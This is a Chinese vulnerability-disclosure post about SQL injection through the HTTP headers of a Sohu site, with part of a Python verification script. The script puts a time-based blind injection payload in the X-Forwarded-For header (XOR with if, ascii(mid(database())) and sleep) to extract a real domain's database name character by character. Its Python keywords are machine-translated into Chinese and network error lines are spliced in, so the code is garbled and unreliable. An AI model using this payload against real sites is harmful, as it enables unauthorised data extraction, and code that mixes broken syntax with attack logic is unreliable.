漏洞标题 搜狐某站HTTP头过滤不严存在SQL注入(附验证脚本) 相关厂商 搜狐 漏洞作者 Vinc 提交时间 2016-05-01 19:58 公开时间 2016-06-16 15:10 漏洞类型 …
从对等方接收数据时失败
导入系统
Payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 @ _。')
打印'[%s]开始重试MySQL数据库()'%time.strftime('%H:%M:%S',time.localtime())
数据库=''
对于范围(1,6,1):中的i
对于有效负载:中的有效负载
试试:
headers={
'User-Agent':'Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/28.0.1500.63 Safari/537.36',
'Referer':'http://f.sohu.com','X-Forwarded-For':'\'XOR(if(ascii(mid(database(),'+ str(i)+',1))=' + STR(ORD(有效载荷))+”,睡眠(10),1))OR \ ''}
从对等方接收数据时失败
-
发表于 2016-07-17 08:00
- 阅读 ( 706 )
- 分类:黑客技术
